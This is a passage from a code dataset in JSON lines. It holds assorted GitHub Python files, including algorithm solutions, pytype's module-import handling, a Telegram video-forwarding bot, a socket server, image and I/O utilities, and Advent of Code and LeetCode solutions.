after\")\n\n\nyield_value = yield_test()\nnext(yield_value)\n# 给个默认值,next读取不到值的时候不会爆 StopIteration 错误\nnext(yield_value,\"end\")\n\n","repo_name":"liangkang1436/PythonLearn","sub_path":"iteration/iteration.py","file_name":"iteration.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"13780413579","text":"import sys\nsys.setrecursionlimit(10**9)\n\nT = int(sys.stdin.readline().strip())\nchoice = []\nvisited = []\ncycle = []\ncnt = [0]\n\ndef dfs(idx):\n global cycle\n\n next_num = choice[idx]\n visited[idx] = 1\n cycle.append(idx)\n\n if visited[next_num] == 1:\n if next_num not in cycle:\n return\n while cycle:\n num = cycle.pop()\n cnt[0] += 1\n if num == next_num:\n break\n return\n \n \n dfs(next_num)\n\nfor _ in range(T):\n n = int(sys.stdin.readline().strip())\n cnt[0] = 0\n choice = [0] + list(map(int, sys.stdin.readline().strip().split()))\n visited = [0] * (n + 1)\n \n for i in range(1, n + 1):\n if visited[i] == 1:\n continue\n cycle = []\n dfs(i)\n print(n - cnt[0])","repo_name":"Yangseyeon/BOJ","sub_path":"03. Gold/9466.py","file_name":"9466.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"28890649231","text":"\"\"\"Handling of module and package related details.\"\"\"\n\nimport dataclasses\nfrom typing import Any\n\nfrom pytype import file_utils\nfrom pytype import module_utils\nfrom pytype.pyi import types\nfrom pytype.pytd import pytd\nfrom pytype.pytd.parse import parser_constants\n\n_ParseError = types.ParseError\n\n\n@dataclasses.dataclass\nclass Import:\n \"\"\"Result of processing an import statement.\"\"\"\n\n pytd_node: Any\n name: str\n new_name: str\n qualified_name: str = \"\"\n\n def pytd_alias(self):\n return pytd.Alias(self.new_name, self.pytd_node)\n\n\nclass Module:\n \"\"\"Module and package details.\"\"\"\n\n def __init__(self, filename, module_name):\n self.filename = filename\n self.module_name = module_name\n is_package = file_utils.is_pyi_directory_init(filename)\n self.package_name = module_utils.get_package_name(module_name, is_package)\n self.parent_name = module_utils.get_package_name(self.package_name, False)\n\n def _qualify_name_with_special_dir(self, orig_name):\n \"\"\"Handle the case of '.' and '..' as package names.\"\"\"\n if \"__PACKAGE__.\" in orig_name:\n # Generated from \"from . import foo\" - see parser.yy\n prefix, _, name = orig_name.partition(\"__PACKAGE__.\")\n if prefix:\n raise _ParseError(f\"Cannot resolve import: {orig_name}\")\n return f\"{self.package_name}.{name}\"\n elif \"__PARENT__.\" in orig_name:\n # Generated from \"from .. import foo\" - see parser.yy\n prefix, _, name = orig_name.partition(\"__PARENT__.\")\n if prefix:\n raise _ParseError(f\"Cannot resolve import: {orig_name}\")\n if not self.parent_name:\n raise _ParseError(\n f\"Cannot resolve relative import ..: Package {self.package_name} \"\n \"has no parent\"\n )\n return f\"{self.parent_name}.{name}\"\n else:\n return None\n\n def qualify_name(self, orig_name):\n \"\"\"Qualify an import name.\"\"\"\n if not self.package_name:\n return orig_name\n rel_name = self._qualify_name_with_special_dir(orig_name)\n if rel_name:\n return rel_name\n if orig_name.startswith(\".\"):\n name = module_utils.get_absolute_name(self.package_name, orig_name)\n if name is None:\n raise _ParseError(\n f\"Cannot resolve relative import {orig_name.rsplit('.', 1)[0]}\")\n return name\n return orig_name\n\n def process_import(self, item):\n \"\"\"Process 'import a, b as c, ...'.\"\"\"\n if isinstance(item, tuple):\n name, new_name = item\n else:\n name = new_name = item\n if name == new_name == \"__builtin__\":\n # 'import __builtin__' should be completely ignored; this is the PY2 name\n # of the builtins module.\n return None\n module_name = self.qualify_name(name)\n as_name = self.qualify_name(new_name)\n t = pytd.Module(name=as_name, module_name=module_name)\n return Import(pytd_node=t, name=name, new_name=new_name)\n\n def process_from_import(self, from_package, item):\n \"\"\"Process 'from a.b.c import d, ...'.\"\"\"\n if isinstance(item, tuple):\n name, new_name = item\n else:\n name = new_name = item\n qualified_name = self.qualify_name(f\"{from_package}.{name}\")\n # We should ideally not need this check, but we have typing\n # special-cased in some places.\n if not qualified_name.startswith(\"typing.\") and name != \"*\":\n # Mark this as an externally imported type, so that AddNamePrefix\n # does not prefix it with the current package name.\n qualified_name = (parser_constants.EXTERNAL_NAME_PREFIX +\n qualified_name)\n t = pytd.NamedType(qualified_name)\n if name == \"*\":\n # A star import is stored as\n # 'imported_mod.* = imported_mod.*'. The imported module needs to be\n # in the alias name so that multiple star imports are handled\n # properly. LookupExternalTypes() replaces the alias with the\n # contents of the imported module.\n assert new_name == name\n new_name = t.name\n return Import(pytd_node=t, name=name, new_name=new_name,\n qualified_name=qualified_name)\n","repo_name":"google/pytype","sub_path":"pytype/pyi/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":4405,"dataset":"github-code","pt":"36"} +{"seq_id":"852830410","text":"from telethon import TelegramClient, events\nfrom decouple import config\nimport logging\nfrom telethon.sessions import StringSession\n\nlogging.basicConfig(format='[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s', level=logging.WARNING)\n\nprint(\"Starting...\")\n\nAPP_ID = APP_ID\nAPI_HASH = \"API_HASH\"\nSESSION = \"SESSION\"\nFROM_ = \"FROM_\"\nTO_ = \"TO_\"\n\n\nFROM = [int(i) for i in FROM_.split()]\nTO = [int(i) for i in TO_.split()]\n\ntry:\n BotzHubUser = TelegramClient(StringSession(SESSION), APP_ID, API_HASH)\n BotzHubUser.start()\nexcept Exception as ap:\n print(f\"ERROR - {ap}\")\n exit(1)\n\n@BotzHubUser.on(events.NewMessage(incoming=True, chats=FROM))\nasync def sender_bH(event):\n if event.message.video: # Only forward if the message contains a video\n for i in TO:\n try:\n await BotzHubUser.send_message(\n i,\n event.message\n )\n print(f\"Video forwarded from {event.chat_id} to {i}\")\n except Exception as e:\n print(e)\n\nprint(\"Bot has started.\")\nBotzHubUser.run_until_disconnected()\n \n","repo_name":"sureshkim/Expazzoo","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"40253263094","text":"import socket\nfrom inspect import cleandoc\nfrom math import sqrt\n\nHOST = 'localhost'\nPORT = 50001\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n s.listen(5)\n print(f'Socket listen on {HOST}:{PORT}')\n print('Waiting clients connection ...')\n\n while True: \n conn, addr = s.accept() # accept client connection\n print(f'Connected by {addr}')\n command_data = ''\n\n base_width = 0\n pyramid_height = 0\n triangle_height = 0\n\n while True:\n bytes_data = conn.recv(1024) # receive data\n command_data = bytes_data.decode()\n\n if ('set-params' in command_data.lower()):\n params = command_data.lower().split()\n for index, option in enumerate(params):\n if index > 0:\n if 's=' in option:\n input_value = option.strip()[2:]\n if input_value.isnumeric():\n base_width = int(input_value)\n elif 't=' in option:\n input_value = option.strip()[2:]\n if input_value.isnumeric():\n pyramid_height = int(input_value)\n elif 'h=' in option:\n input_value = option.strip()[2:]\n if input_value.isnumeric():\n triangle_height = int(input_value)\n if base_width > 0 and pyramid_height > 0:\n triangle_height = sqrt(((base_width/2)**2) + (pyramid_height**2))\n elif base_width > 0 and triangle_height > 0:\n pyramid_height = sqrt((triangle_height**2) - ((base_width/2)**2))\n conn.send('Completed'.encode())\n elif ('help-params' in command_data.lower()):\n conn.send(cleandoc(\"\"\"\n s = Panjang sisi alas piramid\n t = Tinggi piramid\n h = Tinggi sisi tegak piramid\n \"\"\").encode())\n elif ('show-params' in command_data.lower()):\n conn.send(cleandoc(f\"\"\"\n s = {base_width}\n t = {pyramid_height}\n h = {triangle_height}\n \"\"\").encode())\n elif ('count' in command_data.lower()):\n area = (base_width**2) + (4 * (0.5 * base_width * triangle_height))\n conn.send(f'{area}'.encode())\n elif command_data.lower() == 'exit':\n conn.close()\n print(f'Connection {addr} closed')\n break\n else:\n conn.send('Unknown command !'.encode())","repo_name":"zavierferodova/Praktikum-Algopro","sub_path":"Praktikum 10/Kegiatan 3/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"26737059504","text":"import os.path\nimport glob\nimport shutil\nimport re\nimport imagesize\nimport threading\nfrom pathlib import Path\n\nfrom PyQt5 import QtWidgets\nfrom langcodes import Language\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtCore import QRect\nfrom PIL import Image,ImageEnhance,ImageOps\n\nfrom models.const import *\n\ndef find_all_languages():\n\tlanguages = []\n\tfor file in os.listdir(os.path.join(ROOT_DIR, \"languages\")):\n\t\tif re.match(r\"^[a-zA-Z_].*?\\.qm$\", file):\n\t\t\tfile_name = get_file_name(file)\n\t\t\tlanguage_full_name = Language.get(file_name).autonym()\n\t\t\t#print(f\"{file_name}, {language_full_name}\")\n\t\t\tlanguage_full_name = language_full_name.replace(\"(\",\" (\").replace(\")\",\")\")\n\t\t\tlanguages.append({\"name\":language_full_name,\"file\":file_name})\n\tsorted(languages, key=lambda language: language[\"name\"])\n\treturn languages\n\ndef find_all_themes():\n\tthemes = []\n\tfor file in os.listdir(os.path.join(ROOT_DIR, \"themes\")):\n\t\tif re.match(r\"^[a-zA-Z_].*?\\.qss$\", file):\n\t\t\tfile_name = get_file_name(file)\n\t\t\tif file_name != \"default\":\n\t\t\t\tthemes.append({\"name\":file_name})\n\tsorted(themes, key=lambda theme: theme[\"name\"])\n\treturn themes\n\ndef find_all_fonts():\n\tfonts = []\n\tfor file in os.listdir(os.path.join(ROOT_DIR, \"fonts\")):\n\t\tif re.match(r\"^[a-zA-Z_].*?\\.tt[f|c]$\", file):\n\t\t\tfull_path = Path(os.path.join(ROOT_DIR, \"fonts\",file)).as_posix()\n\t\t\tfonts.append({\"name\":file,\"file\":full_path})\n\treturn fonts\n\ndef get_number_of_images_from_folder(folder,num=1,exts=IMAGE_EXTS):\n\tlists = []\n\tfor ext in exts:\n\t\tlists += glob.glob(folder + '/**/*.' + ext, recursive=True)\n\t\tif len(lists) > num > 0:\n\t\t\tbreak\n\tlists.sort()\n\tif len(lists) > num > 0:\n\t\tlists = lists[0:num]\n\treturn lists\n\ndef get_image_list_from_folder(folder,results,main_folder=\"\",exts=IMAGE_EXTS,path=\"\"):\n\tif main_folder == \"\":\n\t\tmain_folder = folder\n\tfiles = sorted(os.listdir(folder))\n\troot_files = []\n\tthreads = []\n\tfor file in files:\n\t\tfull_file = os.path.join(folder,file)\n\t\tfull_file = Path(full_file).as_posix()\n\t\tif os.path.isdir(full_file):\n\t\t\tnew_path = os.path.join(path,file)\n\t\t\tnew_path = Path(new_path).as_posix()\n\t\t\ttmp_threading = threading.Thread(target=get_image_list_from_folder, args=(full_file,results,main_folder,exts,new_path,))\n\t\t\tthreads.append(tmp_threading)\n\t\t\ttmp_threading.start()\n\t\telif get_ext(file) in exts:\n\t\t\t#root_files.append(full_file)\n\t\t\trel_file = Path(os.path.relpath(full_file,main_folder)).as_posix()\n\t\t\troot_files.append(rel_file)\n\n\tfor tmp_threading in threads:\n\t\ttmp_threading.join()\n\n\tif len(root_files) > 0:\n\t\tresults.append({\"path\":path,\"files\":root_files})\n\ndef get_image_list_from_folder_old(folder,exts=IMAGE_EXTS,path=\"\"):\n\tfiles = sorted(os.listdir(folder))\n\troot_files = []\n\tfolder_files = []\n\tfor file in files:\n\t\tfull_file = os.path.join(folder,file)\n\t\tif os.path.isdir(full_file):\n\t\t\ttmp_files = get_image_list_from_folder_old(full_file,exts,os.path.join(path,file))\n\t\t\tif len(tmp_files) > 0:\n\t\t\t\tfolder_files.extend(tmp_files)\n\t\telif get_ext(file) in exts:\n\t\t\troot_files.append(full_file)\n\tresults = []\n\tif len(root_files) > 0:\n\t\tresults.append({\"path\":path,\"files\":root_files})\n\tif len(folder_files) > 0:\n\t\tresults.extend(folder_files)\n\treturn results\n\n\ndef filter_pimage(pimage,contrast=1,sharpness=1,brightness=1,color=1):\n\tnew_pimage = pimage\n\tenhancer = ImageEnhance.Color(new_pimage)\n\tnew_pimage = enhancer.enhance(color)\n\n\tenhancer = ImageEnhance.Contrast(new_pimage)\n\tnew_pimage = enhancer.enhance(contrast)\n\n\tenhancer = ImageEnhance.Brightness(new_pimage)\n\tnew_pimage = enhancer.enhance(brightness)\n\n\tenhancer = ImageEnhance.Sharpness(new_pimage)\n\tnew_pimage = enhancer.enhance(sharpness)\n\n\treturn new_pimage\n\ndef rotate_pimage(pimage,rotate=0,horizontal_flip=False,vertical_flip=False):\n\tnew_pimage = pimage\n\tif rotate > 0:\n\t\tnew_pimage = new_pimage.rotate(-rotate, Image.NEAREST, expand=True)\n\tif horizontal_flip:\n\t\tnew_pimage = ImageOps.mirror(new_pimage)\n\tif vertical_flip:\n\t\tnew_pimage = ImageOps.flip(new_pimage)\n\treturn new_pimage\n\ndef cv_imread(filepath):\n\t# # fix the utf-8 name path!\n\t# cv_img = cv2.imdecode(np.fromfile(filepath,dtype=np.uint8),-1)\n\t# #already is BGR!\n\t# #cv_img = cv2.cvtColor(cv_img,cv2.COLOR_RGB2BGR)\n\t# return cv_img\n\tpass\n\ndef msg_box(message,parent:QtWidgets.QMainWindow = None):\n\tif parent is not None:\n\t\ttitle = parent.windowTitle()\n\telse:\n\t\ttitle = TRSM(\"Comic Toolbox\")\n\tQMessageBox.information(parent, title, message)\n\ndef confirm_box(message,parent:QtWidgets.QMainWindow = None):\n\tif parent is not None:\n\t\ttitle = parent.windowTitle()\n\telse:\n\t\ttitle = TRSM(\"Comic Toolbox\")\n\treply = QMessageBox.question(parent, title, message, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n\tif reply == QMessageBox.Yes:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef copy_all_file(from_folder,to_folder):\n\tfor file_name in os.listdir(from_folder):\n\t\tsource = os.path.join(from_folder, file_name)\n\t\tdestination = os.path.join(to_folder, file_name)\n\t\tif os.path.isfile(source):\n\t\t\tshutil.copy(source, destination)\n\ndef get_file_name(filename):\n\tname = filename.split('.', 1)[0]\n\treturn name\n\ndef get_ext(file_name):\n\text = file_name.rsplit('.', 1)[-1].lower()\n\treturn ext\n\ndef count_file_in_folder(folder):\n\tpath, dirs, files = next(os.walk(folder))\n\treturn len(files)\n\ndef find_rect_to_fit(p_width,p_height,c_width,c_height):\n\tw_ratio = p_width / c_width\n\th_ratio = p_height / c_height\n\tratio = min(w_ratio,h_ratio)\n\tc_final_width = c_width * ratio\n\tc_final_height = c_height * ratio\n\tc_x = (p_width - c_final_width) / 2.0\n\tc_y = (p_height - c_final_height) / 2.0\n\treturn QRect(c_x,c_y,c_final_width,c_final_height)\n\ndef remove_element_of_tuple(tuple_from,need_remove):\n\ttmp_list = list(tuple_from)\n\ttmp_list.remove(need_remove)\n\treturn tuple(tmp_list)\n\ndef get_image_size(file_name):\n\ttry:\n\t\twidth, height = imagesize.get(file_name)\n\t\tif width > 0 and height > 0:\n\t\t\treturn [width,height]\n\t\telse:\n\t\t\tim = Image.open(file_name)\n\t\t\twidth, height = im.size\n\t\t\tif width > 0 and height > 0:\n\t\t\t\treturn [width, height]\n\texcept Exception:\n\t\t#fallback use PIL\n\t\tim = Image.open(file_name)\n\t\twidth, height = im.size\n\t\tif width > 0 and height > 0:\n\t\t\treturn [width, height]\n\treturn [0, 0]\n\n# # for check GPU usage\n# def get_free_gpu_memory():\n# \tnvmlInit()\n# \th = nvmlDeviceGetHandleByIndex(0)\n# \tinfo = nvmlDeviceGetMemoryInfo(h)\n# \tprint(f'total : {info.total}')\n# \tprint(f'free : {info.free}')\n# \tprint(f'used : {info.used}')\n#\n# \tt = torch.cuda.get_device_properties(0).total_memory\n# \tr = torch.cuda.memory_reserved(0)\n# \ta = torch.cuda.memory_allocated(0)\n# \tf = r - a # free inside reserved\n# \tprint(f't: {t}')\n# \tprint(f'r: {r}')\n# \tprint(f'a: {a}')\n# \tprint(f'f: {f}')\n#\n# \tnvidia_smi.nvmlInit()\n#\n# \tdevice_count = nvidia_smi.nvmlDeviceGetCount()\n# \tfor i in range(device_count):\n# \t\thandle = nvidia_smi.nvmlDeviceGetHandleByIndex(i)\n# \t\tinfo = nvidia_smi.nvmlDeviceGetMemoryInfo(handle)\n# \t\tprint(\"Device {}: {}, Memory : ({:.2f}% free): {}(total), {} (free), {} (used)\".format(i, nvidia_smi.nvmlDeviceGetName(handle), 100*info.free/info.total, info.total, info.free, info.used))\n#\n# \tnvidia_smi.nvmlShutdown()\n\n","repo_name":"freedy82/Comic-Toolbox","sub_path":"models/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7079,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"36"} +{"seq_id":"20156789667","text":"from tp_final.clases_tp_final.db import DB\n\nclass Butaca(object):\n idButaca = None\n id_sala = None\n precio_butaca = None\n\n def Dar_de_Alta_Butaca(self):\n DB.run(\"Insert into Butaca(idButaca,Sala_idSala,precio_butaca) VALUES (\" + str(self.idButaca) + \",\" + str(self.id_sala) +\",\" + str(self.precio_butaca) +\")\")\n\n @staticmethod\n def get_butaca(idButaca):\n cursor_butaca = DB.run(\"Select * from Butaca where idButaca = \"+idButaca+\"\")\n B = Butaca()\n dict = cursor_butaca.fetchone()\n B.idButaca = dict['idButaca']\n B.id_sala = dict['Sala_idSala']\n B.precio_butaca = dict['precio_butaca']\n return B\n","repo_name":"politecnicomodelopoo2018/Getar3","sub_path":"tp_final/clases_tp_final/butaca.py","file_name":"butaca.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"8539718014","text":"#check one day, see how all the prices changes\nimport csv \nimport pickle\nimport numpy as np\n\ntrain = []\nfor dnum in range(1,201):\n\tif dnum == 22:\n\t\tpass\n\telse:\n\t\tday = []\n\t\twith open('data/%d.csv'% dnum ) as f:\n\t\t\treader = csv.reader( f, delimiter=',' )\n\t\t\treader.next()\n\t\t\tfor row in reader:\n\t\t\t\tday.append( np.array( map( float, row ) ) )\n\t\tday = np.vstack( day )\n\t\ttrain.append( day )\n\ntest = []\nfor dnum in range(201, 511):\n\tday = []\n\twith open('data/%d.csv'% dnum ) as f:\n\t\treader = csv.reader( f, delimiter=',' )\n\t\treader.next()\n\t\tfor row in reader:\n\t\t\tday.append( np.array( map( float, row ) ) )\n\tday = np.vstack( day )\n\ttest.append( day )\npickle.dump( train, open('output/train.pkl', 'w') )\npickle.dump( test, open( 'output/test.pkl', 'w' ) )\n\ny = []\nwith open( 'trainLabels.csv' ) as f:\n\treader = csv.reader( f, delimiter=',' ) \n\treader.next()\n\tcount = 1\n\tfor row in reader:\n\t\tif count == 22:\n\t\t\tpass\n\t\telse:\n\t\t\ty.append( np.array( map( float, row ) )[1:] )\n\t\tcount += 1\ny = np.vstack( y )\npickle.dump( y, open('output/y.pkl', 'w' ) )\n\n\ntrain_ar = []\ntest_ar = []\nfor i in range( 198 ):\n\tar_train = []\n\tar_test = []\n\tfor j in range(len(train)):\n\t\tar_train.append( train[j][:,i] )\n\tfor j in range(len(test)):\n\t\tar_test.append( test[j][:,i] )\n\tar_train = np.vstack( ar_train )\n\tar_test = np.vstack( ar_test )\n\ttrain_ar.append( ar_train )\n\ttest_ar.append( ar_test )\n\npickle.dump( (train_ar,test_ar), open('output/ar.pkl', 'w' ) )\n\ntrain_diff = []\ntest_diff = []\nfor i in range( 198 ):\n\tdiff_1 = []\n\tdiff_2 = []\n\tfor j in range( len(train)):\n\t\tdiff_day = train[j][1:,i]\n\t\tfor k in reversed( range( 1, len(diff_day) ) ):\n\t\t\tdiff_day[ k ] = diff_day[k] - diff_day[k-1]\n\t\tdiff_1.append( diff_day )\n\tfor j in range( len(test) ):\n\t\tdiff_day = test[j][1:,i]\n\t\tfor k in reversed( range( 1, len(diff_day) ) ):\n\t\t\tdiff_day[ k ] = diff_day[k] - diff_day[k-1]\n\t\tdiff_2.append( diff_day )\n\tdiff_1 = np.vstack( diff_1 )\n\tdiff_2 = np.vstack( diff_2 )\n\ttrain_diff.append( diff_1 )\n\ttest_diff.append( diff_2 )\npickle.dump( (train_diff, test_diff), open('output/diff.pkl', 'w') )\n\n\ninst_len = 198 \nout_len = 244\n\n'''\nfrom pylab import *\n\nday1 = train[0]\nx = range( 0, day1.shape[0] )\nfor t in range( inst_len + 1 ):\n\tplot( x, day1[:, t] )\nshow()\n'''\n","repo_name":"namhyo01/kaggle_study","sub_path":"battlefin-s-big-data-combine-forecasting-challenge/@BigBear/dataProcess.py","file_name":"dataProcess.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"23347436331","text":"class Solution:\n def rob(self, nums: List[int]) -> int:\n if not nums:\n return 0\n if len(nums)==1:\n return nums[0]\n if len(nums)==2:\n return max(nums[0], nums[1])\n \n \n dp0 = {}\n dp1 = {}\n \n dp0[0] = 0\n dp0[1] = nums[0]\n \n dp1[0] = 0\n dp1[1] = nums[1]\n \n i=2\n j = 2\n \n while i= 4:\n name = \"of \" + arg[4] if len(arg) == 5 else \"\"\n arg_min = arg[2]\n arg_max = arg[3]\n if hasattr(arg_val, \"__len__\"):\n val = \"Length\"\n num = len(arg_val)\n else:\n val = \"Value\"\n num = arg_val\n if arg_min is not None and num < arg_min:\n raise ValueError(\"{} {} must be greater or equal to {}\".format(val, name, arg_min))\n if arg_max is not None and num >= arg_max:\n raise ValueError(\"{} {} must be less than {}\".format(val, name, arg_max))\n\n\ndef validate_existing_filepath(arg):\n \"\"\"Validates an input argument is a path string to an existing file.\"\"\"\n validate((arg, str, 0, 255))\n if not os.path.isfile(arg):\n raise ValueError(\"{0} does not exist.\".format(arg))\n return arg\n\n\ndef validate_existing_directory(arg):\n \"\"\"Validates an input argument is a path string to an existing directory.\"\"\"\n arg = os.path.abspath(arg)\n validate((arg, str, 0, 255))\n if not os.path.isdir(arg):\n raise ValueError(\"{0} does not exist\".format(arg))\n return arg\n\n\ndef validate_existing_path(arg):\n \"\"\"Validates an input argument is a path string to an existing file or directory.\"\"\"\n arg = os.path.abspath(arg)\n validate((arg, str, 0, 255))\n if not os.path.exists(arg):\n raise ValueError(\"{0} does not exist\".format(arg))\n return arg\n\n\ndef validate_parent_exists(arg):\n \"\"\"Validates an input argument is a path string, and its parent directory exists.\"\"\"\n arg = os.path.abspath(arg)\n dir_arg = os.path.dirname(os.path.abspath(arg))\n if validate_existing_directory(dir_arg):\n return arg\n return None\n\n\ndef valid_path_append(path, *args):\n \"\"\"\n Helper to validate passed path directory and append any subsequent\n filename arguments.\n\n Arguments:\n path (str): Initial filesystem path. Should expand to a valid\n directory.\n *args (list, optional): Any filename or path suffices to append to path\n for returning.\n Returns:\n (list, str): path prepended list of files from args, or path alone if\n no args specified.\n Raises:\n ValueError: if path is not a valid directory on this filesystem.\n \"\"\"\n full_path = os.path.expanduser(path)\n res = []\n if not os.path.exists(full_path):\n os.makedirs(full_path)\n if not os.path.isdir(full_path):\n raise ValueError(\"path: {0} is not a valid directory\".format(path))\n for suffix_path in args:\n res.append(os.path.join(full_path, suffix_path))\n if len(res) == 0:\n return path\n if len(res) == 1:\n return res[0]\n return res\n\n\ndef sanitize_path(path):\n s_path = os.path.normpath(\"/\" + path).lstrip(\"/\")\n assert len(s_path) < 255\n return s_path\n\n\ndef check(validator):\n class CustomAction(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n validator(values)\n setattr(namespace, self.dest, values)\n\n return CustomAction\n\n\ndef check_size(min_size=None, max_size=None):\n class CustomAction(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n validate((values, self.type, min_size, max_size, self.dest))\n setattr(namespace, self.dest, values)\n\n return CustomAction\n\n\ndef validate_proxy_path(arg):\n \"\"\"Validates an input argument is a valid proxy path or None\"\"\"\n proxy_validation_regex = re.compile(\n r\"^(?:http|ftp)s?://\" # http:// or https://\n r\"(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|\"\n r\"localhost|\" # localhost...\n r\"\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\" # ...or ip\n r\"(?::\\d+)?\" # optional port\n r\"(?:/?|[/?]\\S+)$\",\n re.IGNORECASE,\n )\n if arg is not None and re.match(proxy_validation_regex, arg) is None:\n raise ValueError(\"{0} is not a valid proxy path\".format(arg))\n return arg\n\n\ndef validate_boolean(arg):\n \"\"\"Validates an input argument of type boolean\"\"\"\n if arg.lower() not in [\"true\", \"false\"]:\n raise argparse.ArgumentTypeError(\"expected true | false argument\")\n return arg.lower() == \"true\"\n\n\ndef load_json_file(file_path):\n \"\"\"load a file into a json object\"\"\"\n try:\n with open(file_path) as small_file:\n return json.load(small_file)\n except OSError as e:\n print(e)\n print(\"trying to read file in blocks\")\n with open(file_path) as big_file:\n json_string = \"\"\n while True:\n block = big_file.read(64 * (1 << 20)) # Read 64 MB at a time;\n json_string = json_string + block\n if not block: # Reached EOF\n break\n return json.loads(json_string)\n\n\ndef json_dumper(obj):\n \"\"\"for objects that have members that cant be serialized and implement toJson() method\"\"\"\n try:\n return obj.toJson()\n except Exception:\n return obj.__dict__\n\n\ndef load_files_from_path(dir_path, extension=\"txt\"):\n \"\"\"load all files from given directory (with given extension)\"\"\"\n files = [\n os.path.join(dir_path, f)\n for f in os.listdir(dir_path)\n if os.path.isfile(os.path.join(dir_path, f)) and f.endswith(extension)\n ]\n files_data = []\n for f in files:\n with open(f) as fp:\n files_data.append(\" \".join(map(str.strip, fp.readlines())))\n return files_data\n\n\ndef create_folder(path):\n if path:\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef download_unzip(\n url: str, sourcefile: str, unzipped_path: str or PathLike, license_msg: str = None\n):\n \"\"\"Downloads a zip file, extracts it to destination, deletes the zip file. If license_msg is\n supplied, user is prompted for download confirmation.\"\"\"\n dest_parent = Path(unzipped_path).parent\n\n if not os.path.exists(unzipped_path):\n if license_msg is None or license_prompt(license_msg, urlparse(url).netloc):\n zip_path = dest_parent / sourcefile\n makedirs(dest_parent, exist_ok=True)\n download_unlicensed_file(url, sourcefile, zip_path)\n print(\"Unzipping...\")\n uncompress_file(zip_path, dest_parent)\n return unzipped_path\n\n\ndef line_count(file):\n \"\"\"Utility function for getting number of lines in a text file.\"\"\"\n count = 0\n with open(file, encoding=\"utf-8\") as f:\n for _ in f:\n count += 1\n return count\n\n\ndef prepare_output_path(output_dir: str, overwrite_output_dir: str):\n \"\"\"Create output directory or throw error if exists and overwrite_output_dir is false\"\"\"\n if os.path.exists(output_dir) and os.listdir(output_dir) and not overwrite_output_dir:\n raise ValueError(\n \"Output directory ({}) already exists and is not empty. Use --overwrite_output_dir \"\n \"to overcome.\".format(output_dir)\n )\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n","repo_name":"IntelLabs/nlp-architect","sub_path":"nlp_architect/utils/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":11915,"program_lang":"python","lang":"en","doc_type":"code","stars":2921,"dataset":"github-code","pt":"36"} +{"seq_id":"24030965236","text":"import functools\n\nclass Corrupted(Exception):\n\n def __init__(self, char):\n self.char = char\n\n\npush_pop_map = {\"(\": \")\", \"[\": \"]\", \"{\": \"}\", \"<\": \">\"}\npush_chars = set(push_pop_map.keys())\npop_chars = set(push_pop_map.values())\nerror_score = {\")\": 3, \"]\": 57, \"}\": 1197, \">\": 25137}\nincomplete_score = {\")\": 1, \"]\": 2, \"}\": 3, \">\": 4}\n\n\nwith open(\"input.txt\") as f:\n lines = [line.strip() for line in f.readlines()]\n for line in lines: # Input consistency\n assert len(set(line) - push_chars - pop_chars) == 0\n\n\ndef parse_line(line):\n current_push_char = line[0]\n assert current_push_char in push_chars # Invariant\n remaining = line[1:]\n\n if remaining == \"\": # Incomplete\n return \"\", [push_pop_map[current_push_char]]\n while remaining[0] in push_chars:\n remaining, missing_closing_chars = parse_line(remaining)\n if remaining == \"\": # Incomplete\n return \"\", missing_closing_chars + [push_pop_map[current_push_char]]\n\n if remaining[0] == push_pop_map[current_push_char]:\n return remaining[1:], []\n raise Corrupted(remaining[0])\n\n\ntotal_error_score = 0\nincomplete_scores_list = []\nfor line in lines:\n try:\n if not line:\n continue\n if line[0] not in push_chars:\n raise Corrupted(line[0])\n _, missing_closing_chars = parse_line(line)\n if missing_closing_chars:\n incomplete_scores_list.append(functools.reduce(\n lambda acc, v: 5 * acc + v,\n [incomplete_score[c] for c in missing_closing_chars],\n 0\n ))\n except Corrupted as e:\n total_error_score += error_score[e.char]\n\n\nprint(\"Part 1:\", total_error_score)\nprint(\"Part 2:\", sorted(incomplete_scores_list)[len(incomplete_scores_list) // 2])\n","repo_name":"leonardocarvalho/advent-of-code-2021","sub_path":"10/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"19557051480","text":"import sys\n\ninput = sys.stdin.readline\nn = int(input())\ns = {}\nfor _ in range(n):\n a, b = input().split()\n if a not in s:\n s[a] = int(b)\n else:\n s[a] += int(b)\nfor i in sorted(s):\n print(i, 